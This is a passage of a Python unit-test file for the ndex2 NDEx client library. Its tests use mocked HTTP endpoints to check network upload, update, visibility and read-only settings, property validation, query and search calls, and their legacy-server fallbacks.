            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.post(client.DEFAULT_SERVER + '/rest/network/asCX',
                   request_headers={'Connection': 'close'},
                   status_code=1,
                   text=resurl)
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.save_new_network([{'foo': '123'}])
            self.assertEqual(res, resurl)
            # inspect the raw multipart body that was posted
            decode_txt = m.last_request.text.read().decode('UTF-8')
            self.assertTrue('Content-Disposition: form-data; '
                            'name="CXNetworkStream"; '
                            'filename="filename"' in decode_txt)
            self.assertTrue('Content-Type: application/'
                            'octet-stream' in decode_txt)
            self.assertTrue('{"foo": "123"}' in decode_txt)
            # status aspect should have been added automatically
            self.assertTrue('{"status": [{"' in decode_txt)
            self.assertTrue('"error": ""' in decode_txt)
            self.assertTrue('"success": true' in decode_txt)
    def test_save_new_network_cx_with_emptystatus_and_publicvisibility(self):
        """Verify save_new_network() fills in an empty status aspect and
        adds the visibility=PUBLIC query parameter when requested."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/network?visibility=PUBLIC',
                   request_headers={'Connection': 'close'},
                   status_code=1,
                   text=resurl)
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.save_new_network([{'foo': '123'},
                                         {"status": []}],
                                        visibility='PUBLIC')
            self.assertEqual(res, resurl)
            # inspect the raw multipart body that was posted
            decode_txt = m.last_request.text.read().decode('UTF-8')
            self.assertTrue('Content-Disposition: form-data; '
                            'name="CXNetworkStream"; '
                            'filename="filename"' in decode_txt)
            self.assertTrue('Content-Type: application/'
                            'octet-stream' in decode_txt)
            self.assertTrue('{"foo": "123"}' in decode_txt)
            # the empty status aspect should have been populated
            self.assertTrue('{"status": [{"' in decode_txt)
            self.assertTrue('"error": ""' in decode_txt)
            self.assertTrue('"success": true' in decode_txt)
    def test_save_new_network_cx_with_status(self):
        """Verify save_new_network() leaves an already-complete status
        aspect intact when posting CX."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/network',
                   request_headers={'Connection': 'close'},
                   status_code=1,
                   text=resurl)
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.save_new_network([{'foo': '123'},
                                         {"status": [{"error": "",
                                                      "success": True}]}])
            self.assertEqual(res, resurl)
            # inspect the raw multipart body that was posted
            decode_txt = m.last_request.text.read().decode('UTF-8')
            self.assertTrue('Content-Disposition: '
                            'form-data; name="CXNetworkStream"; '
                            'filename="filename"' in decode_txt)
            self.assertTrue('Content-Type: application/'
                            'octet-stream' in decode_txt)
            self.assertTrue('{"foo": "123"}' in decode_txt)
            self.assertTrue('{"status": [{"' in decode_txt)
            self.assertTrue('"error": ""' in decode_txt)
            self.assertTrue('"success": true' in decode_txt)
    def test_update_cx_network_success(self):
        """Verify update_cx_network() PUTs a CX stream as multipart data
        to the NDEx v2 network endpoint."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/someid',
                  request_headers={'Connection': 'close'},
                  status_code=1,
                  text=resurl)
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            cx = [{'foo': '123'},
                  {"status": [{"error": "", "success": True}]}]
            # build a bytes stream on py3, str stream on py2
            if sys.version_info.major == 3:
                stream = io.BytesIO(json.dumps(cx,
                                               cls=DecimalEncoder)
                                    .encode('utf-8'))
            else:
                stream = io.BytesIO(json.dumps(cx, cls=DecimalEncoder))
            res = ndex.update_cx_network(stream, 'someid')
            self.assertEqual(res, resurl)
            # inspect the raw multipart body that was sent
            decode_txt = m.last_request.text.read().decode('UTF-8')
            self.assertTrue('Content-Disposition: form-data; '
                            'name="CXNetworkStream"; '
                            'filename="filename"' in decode_txt)
            self.assertTrue('Content-Type: application/'
                            'octet-stream' in decode_txt)
            self.assertTrue('{"foo": "123"}' in decode_txt)
            self.assertTrue('{"status": [{"' in decode_txt)
            self.assertTrue('"error": ""' in decode_txt)
            self.assertTrue('"success": true' in decode_txt)
    def test_update_cx_network_success_ndexv1(self):
        """Same as test_update_cx_network_success but against a legacy
        (no version reported) server using the /rest API."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/rest/network/asdf'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.put(client.DEFAULT_SERVER + '/rest/network/asCX/someid',
                  request_headers={'Connection': 'close'},
                  status_code=1,
                  text=resurl)
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            cx = [{'foo': '123'},
                  {"status": [{"error": "", "success": True}]}]
            # build a bytes stream on py3, str stream on py2
            if sys.version_info.major == 3:
                stream = io.BytesIO(json.dumps(cx,
                                               cls=DecimalEncoder)
                                    .encode('utf-8'))
            else:
                stream = io.BytesIO(json.dumps(cx, cls=DecimalEncoder))
            res = ndex.update_cx_network(stream, 'someid')
            self.assertEqual(res, resurl)
            # inspect the raw multipart body that was sent
            decode_txt = m.last_request.text.read().decode('UTF-8')
            self.assertTrue('Content-Disposition: form-data; '
                            'name="CXNetworkStream"; '
                            'filename="filename"' in decode_txt)
            self.assertTrue('Content-Type: application/'
                            'octet-stream' in decode_txt)
            self.assertTrue('{"foo": "123"}' in decode_txt)
            self.assertTrue('{"status": [{"' in decode_txt)
            self.assertTrue('"error": ""' in decode_txt)
            self.assertTrue('"success": true' in decode_txt)
    def test_validate_network_system_properties(self):
        """Exercise _validate_network_system_properties() with every
        invalid input shape, then a valid dict, then skipvalidation."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try passing none
            try:
                ndex._validate_network_system_properties(None)
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('network_properties must be a '
                                 'string or a dict', str(ne))
            # try passing empty string
            try:
                ndex._validate_network_system_properties('')
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertTrue('Error parsing json string' in str(ne))
            # try passing empty dict
            try:
                ndex._validate_network_system_properties({})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertTrue('network_properties appears to '
                                'be empty' in str(ne))
            # try passing invalid property
            try:
                ndex._validate_network_system_properties({'showcase': True,
                                                          'foo': 'blah'})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('foo is not a valid network system '
                                 'property', str(ne))
            # try passing invalid readOnly property
            try:
                ndex._validate_network_system_properties({'showcase': True,
                                                          'readOnly': 'blah'})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('readOnly value must be a bool '
                                 'set to True or False', str(ne))
            # try passing invalid showcase property
            try:
                ndex._validate_network_system_properties({'showcase': 'haha'})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('showcase value must be a bool '
                                 'set to True or False', str(ne))
            # try passing invalid index_level property as bool
            try:
                ndex._validate_network_system_properties({'index_level':
                                                          False})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('index_level value must be '
                                 'a string set to NONE, META, or ALL', str(ne))
            # try passing invalid index_level property
            try:
                ndex._validate_network_system_properties({'index_level':
                                                          'blah'})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('index_level value must be '
                                 'a string set to NONE, META, or ALL', str(ne))
            # try passing invalid visibility property bool
            try:
                ndex._validate_network_system_properties({'visibility': True})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('visibility value must be '
                                 'a string set to PUBLIC or PRIVATE',
                                 str(ne))
            # try passing invalid visibility property
            try:
                ndex._validate_network_system_properties({'visibility':
                                                          'ha'})
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('visibility value must be '
                                 'a string set to PUBLIC or PRIVATE',
                                 str(ne))
            # try passing valid dict
            valid_dict = {'showcase': True,
                          'visibility': 'PUBLIC',
                          'index_level': 'ALL',
                          'readOnly': True}
            res = ndex._validate_network_system_properties(valid_dict)
            check_dict = json.loads(res)
            self.assertEqual(valid_dict, check_dict)
            # try passing dict with validation off
            res = ndex._validate_network_system_properties({},
                                                           skipvalidation=True)
            self.assertEqual('{}', res)
    def test_set_network_system_properties_test_no_auth(self):
        """Verify set_network_system_properties() raises
        NDExUnauthorizedError when no credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.set_network_system_properties('236ecfce-be48-4652-'
                                                   'b488-b08f0cc9c795',
                                                   {'visibility': 'PUBLIC'})
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('This method requires user '
                                 'authentication', str(ne))
    def test_set_network_system_properties_invalid_propertytype(self):
        """Verify set_network_system_properties() rejects a properties
        argument that is neither a string nor a dict."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            try:
                ndex.set_network_system_properties('236ecfce-be48-4652-b488-'
                                                   'b08f0cc9c795',
                                                   True)
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('network_properties '
                                 'must be a string or a dict', str(ne))
    def test_set_network_system_properties_ndexv1(self):
        """Verify set_network_system_properties() raises
        NDExUnsupportedCallError against a pre-2.0 server."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            valid_dict = {'showcase': True,
                          'visibility': 'PUBLIC',
                          'index_level': 'ALL',
                          'readOnly': True}
            try:
                ndex.set_network_system_properties(theuuid,
                                                   valid_dict)
                self.fail('Expected NDExUnsupportedCallError')
            except NDExUnsupportedCallError as ne:
                self.assertEqual('This call only works with NDEx 2+',
                                 str(ne))
    def test_set_network_system_properties_success(self):
        """Verify set_network_system_properties() PUTs the validated
        properties dict as JSON to the systemproperty endpoint."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/' +
                  theuuid + '/systemproperty',
                  request_headers={'Content-Type': 'application/json;'
                                   'charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'},
                  status_code=200,
                  text='')
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            valid_dict = {'showcase': True,
                          'visibility': 'PUBLIC',
                          'index_level': 'ALL',
                          'readOnly': True}
            res = ndex.set_network_system_properties(theuuid,
                                                     valid_dict)
            self.assertEqual('', res)
            # verify the exact JSON body sent to the server
            checkdict = json.loads(m.last_request.text)
            self.assertEqual(valid_dict, checkdict)
    def test_make_network_public_noauth(self):
        """Verify make_network_public() raises NDExUnauthorizedError
        when no credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.make_network_public('236ecfce-be48-4652-b488-'
                                         'b08f0cc9c795')
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('This method requires user authentication',
                                 str(ne))
    def test_make_network_public_success(self):
        """Verify make_network_public() PUTs visibility=PUBLIC to the
        systemproperty endpoint."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/' +
                  theuuid + '/systemproperty',
                  request_headers={'Content-Type': 'application/json;'
                                   'charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'},
                  status_code=200,
                  text='')
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.make_network_public(theuuid)
            self.assertEqual('', res)
            # verify the exact JSON body sent to the server
            checkdict = json.loads(m.last_request.text)
            self.assertEqual({'visibility': 'PUBLIC'}, checkdict)
    def test_make_network_private_noauth(self):
        """Verify make_network_private() raises NDExUnauthorizedError
        when no credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.make_network_private('236ecfce-be48-4652-b488-'
                                          'b08f0cc9c795')
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('This method requires user authentication',
                                 str(ne))
    def test_make_network_private_success(self):
        """Verify make_network_private() PUTs visibility=PRIVATE to the
        systemproperty endpoint."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/' +
                  theuuid + '/systemproperty',
                  request_headers={'Content-Type': 'application/json;'
                                   'charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'},
                  status_code=200,
                  text='')
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.make_network_private(theuuid)
            self.assertEqual('', res)
            # verify the exact JSON body sent to the server
            checkdict = json.loads(m.last_request.text)
            self.assertEqual({'visibility': 'PRIVATE'}, checkdict)
    def test_make_network_public_indexed_noauth(self):
        """Verify _make_network_public_indexed() raises
        NDExUnauthorizedError when no credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex._make_network_public_indexed('236ecfce-be48-4652-'
                                                  'b488-b08f0cc9c795')
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('This method requires user authentication',
                                 str(ne))
    def test_make_network_public_indexed_success(self):
        """Verify _make_network_public_indexed() PUTs PUBLIC visibility,
        full indexing, and showcase to the systemproperty endpoint."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/' +
                  theuuid + '/systemproperty',
                  request_headers={'Content-Type': 'application/json;'
                                   'charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'},
                  status_code=200,
                  text='')
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex._make_network_public_indexed(theuuid)
            self.assertEqual('', res)
            # verify the exact JSON body sent to the server
            checkdict = json.loads(m.last_request.text)
            self.assertEqual({'visibility': 'PUBLIC',
                              'index_level': 'ALL',
                              'showcase': True}, checkdict)
    def test_make_network_public_indexed_ndexv1(self):
        """Verify _make_network_public_indexed() raises
        NDExUnsupportedCallError against a pre-2.0 server."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            try:
                ndex._make_network_public_indexed(theuuid)
                self.fail('Expected NDExUnsupportedCallError')
            except NDExUnsupportedCallError as ne:
                self.assertEqual('Only 2+ of NDEx supports '
                                 'setting/changing index level', str(ne))
    def test_set_read_only_noauth(self):
        """Verify set_read_only() raises NDExUnauthorizedError when no
        credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.set_read_only('236ecfce-be48-4652-b488-b08f0cc9c795',
                                   True)
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('This method requires user authentication',
                                 str(ne))
    def test_set_read_only_true_success(self):
        """Verify set_read_only(True) PUTs readOnly=true to the
        systemproperty endpoint."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/' +
                  theuuid + '/systemproperty',
                  request_headers={'Content-Type': 'application/json;'
                                   'charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'},
                  status_code=200,
                  text='')
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.set_read_only(theuuid, True)
            self.assertEqual('', res)
            # verify the exact JSON body sent to the server
            checkdict = json.loads(m.last_request.text)
            self.assertEqual({'readOnly': True}, checkdict)
    def test_set_read_only_false_success(self):
        """Verify set_read_only(False) PUTs readOnly=false to the
        systemproperty endpoint."""
        theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/network/' +
                  theuuid + '/systemproperty',
                  request_headers={'Content-Type': 'application/json;'
                                   'charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'},
                  status_code=200,
                  text='')
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.set_read_only(theuuid, False)
            self.assertEqual('', res)
            # verify the exact JSON body sent to the server
            checkdict = json.loads(m.last_request.text)
            self.assertEqual({'readOnly': False}, checkdict)
    def test_get_network_as_cx_stream_success(self):
        """Verify get_network_as_cx_stream() returns the raw response
        from the NDEx v2 network endpoint."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(client.DEFAULT_SERVER + '/v2/network/someid',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_network_as_cx_stream('someid')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_network_as_cx_stream_success_ndexv1(self):
        """Verify get_network_as_cx_stream() uses the legacy
        /rest/.../asCX endpoint when the server reports no version."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.get(client.DEFAULT_SERVER + '/rest/network/someid/asCX',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_network_as_cx_stream('someid')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_network_aspect_as_cx_stream_success(self):
        """Verify get_network_aspect_as_cx_stream() hits the NDEx v2
        aspect endpoint and returns the raw response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(client.DEFAULT_SERVER + '/v2/network/someid/aspect/sa',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_network_aspect_as_cx_stream('someid', 'sa')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_network_aspect_as_cx_stream_success_ndexv1(self):
        """Verify get_network_aspect_as_cx_stream() falls back to the
        legacy whole-network /rest/.../asCX endpoint on a pre-2.0
        server (aspect endpoint does not exist there)."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.get(client.DEFAULT_SERVER + '/rest/network/someid/asCX',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_network_aspect_as_cx_stream('someid', 'sa')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_neighborhood_as_cx_stream(self):
        """Verify get_neighborhood_as_cx_stream() POSTs to the NDEx v2
        search/query endpoint and returns the raw response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
                   status_code=200,
                   json={'hi': 'bye'},
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_neighborhood_as_cx_stream('someid',
                                                     'query')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_neighborhood_as_cx_stream_ndexv1(self):
        """Verify get_neighborhood_as_cx_stream() uses the legacy
        /rest/network/.../query endpoint on a pre-2.0 server."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.post(client.DEFAULT_SERVER + '/rest/network/someid/query',
                   status_code=200,
                   json={'hi': 'bye'},
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_neighborhood_as_cx_stream('someid',
                                                     'query')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_neighborhood(self):
        """Verify get_neighborhood() unwraps the 'data' key of a dict
        response from the query endpoint."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
                   status_code=200,
                   json={'data': [{'hi': 'bye'}]},
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_neighborhood('someid', 'query')
            self.assertEqual(res, [{'hi': 'bye'}])
    def test_get_neighborhood_list_return(self):
        """Verify get_neighborhood() passes through a list response
        from the query endpoint unchanged."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
                   status_code=200,
                   json=[{'hi': 'bye'}],
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_neighborhood('someid', 'query')
            self.assertEqual(res, [{'hi': 'bye'}])
    def test_get_neighborhood_str_return(self):
        """Verify get_neighborhood() passes through a plain-string
        response from the query endpoint unchanged."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
                   status_code=200,
                   json='blah',
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_neighborhood('someid', 'query')
            self.assertEqual(res, 'blah')
    def test_get_neighborhood_ndexv1(self):
        """Verify get_neighborhood() raises on a pre-2.0 server, which
        only supports get_neighborhood_as_cx_stream()."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            try:
                ndex.get_neighborhood('someid', 'query')
                self.fail('Expected Exception')
            except Exception as e:
                self.assertEqual('get_neighborhood is not supported for '
                                 'versions prior to 2.0, use '
                                 'get_neighborhood_as_cx_stream', str(e))
    def test_upload_file(self):
        """Verify upload_file() raises NDExError for a nonexistent
        file path."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.upload_file('foo')
                self.fail('Expected NDExError')
            except NDExError:
                pass
    def test_get_interconnectquery_as_cx_stream(self):
        """Verify get_interconnectquery_as_cx_stream() POSTs to the
        interconnectquery endpoint and returns the raw response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER +
                   '/v2/search/network/someid/interconnectquery',
                   status_code=200,
                   json={'hi': 'bye'},
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_interconnectquery_as_cx_stream('someid',
                                                          'query')
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_get_interconnectquery(self):
        """Verify get_interconnectquery() unwraps the 'data' key of a
        dict response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER +
                   '/v2/search/network/someid/interconnectquery',
                   status_code=200,
                   json={'data': [{'hi': 'bye'}]},
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_interconnectquery('someid', 'query')
            self.assertEqual(res, [{'hi': 'bye'}])
    def test_get_interconnectquery_as_list(self):
        """Verify get_interconnectquery() passes through a list
        response unchanged."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER +
                   '/v2/search/network/someid/interconnectquery',
                   status_code=200,
                   json=[{'hi': 'bye'}],
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_interconnectquery('someid', 'query')
            self.assertEqual(res, [{'hi': 'bye'}])
    def test_get_interconnectquery_as_str(self):
        """Verify get_interconnectquery() passes through a plain-string
        response unchanged."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER +
                   '/v2/search/network/someid/interconnectquery',
                   status_code=200,
                   json='foo',
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_interconnectquery('someid', 'query')
            self.assertEqual(res, 'foo')
    def test_search_networks(self):
        """Verify search_networks() POSTs to the NDEx v2 search
        endpoint with start/size query parameters."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER +
                   '/v2/search/network?start=0&size=100',
                   status_code=200,
                   json={'hi': 'bye'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.search_networks(search_string='hi',
                                       account_name='bob',
                                       include_groups=True)
            self.assertEqual(res, {'hi': 'bye'})
    def test_search_networks_ndexv1(self):
        """Verify search_networks() uses the legacy
        /rest/network/search/<start>/<size> endpoint on a pre-2.0
        server."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.post(client.DEFAULT_SERVER + '/rest/network/search/0/100',
                   status_code=200,
                   json={'hi': 'bye'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.search_networks(search_string='hi',
                                       account_name='bob',
                                       include_groups=True)
            self.assertEqual(res, {'hi': 'bye'})
    def test_search_networks_by_property_filter(self):
        """Verify search_networks_by_property_filter() raises (the call
        is not supported)."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.search_networks_by_property_filter()
                self.fail('Expected Exception')
            except Exception:
                pass
    def test_get_network_summary(self):
        """Verify get_network_summary() returns the JSON from the NDEx
        v2 summary endpoint."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(client.DEFAULT_SERVER + '/v2/network/someid/summary',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_network_summary('someid')
            self.assertEqual(res, {'hi': 'bye'})
    def test_get_network_summary_ndexv1(self):
        """Verify get_network_summary() uses the legacy /rest/network
        endpoint on a pre-2.0 server."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict(version=None))
            m.get(client.DEFAULT_SERVER + '/rest/network/someid',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_network_summary('someid')
            self.assertEqual(res, {'hi': 'bye'})
    def test_delete_networkset_none_passed_in(self):
        """Verify delete_networkset() raises NDExInvalidParameterError
        when the networkset id is None."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            try:
                ndex.delete_networkset(None)
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
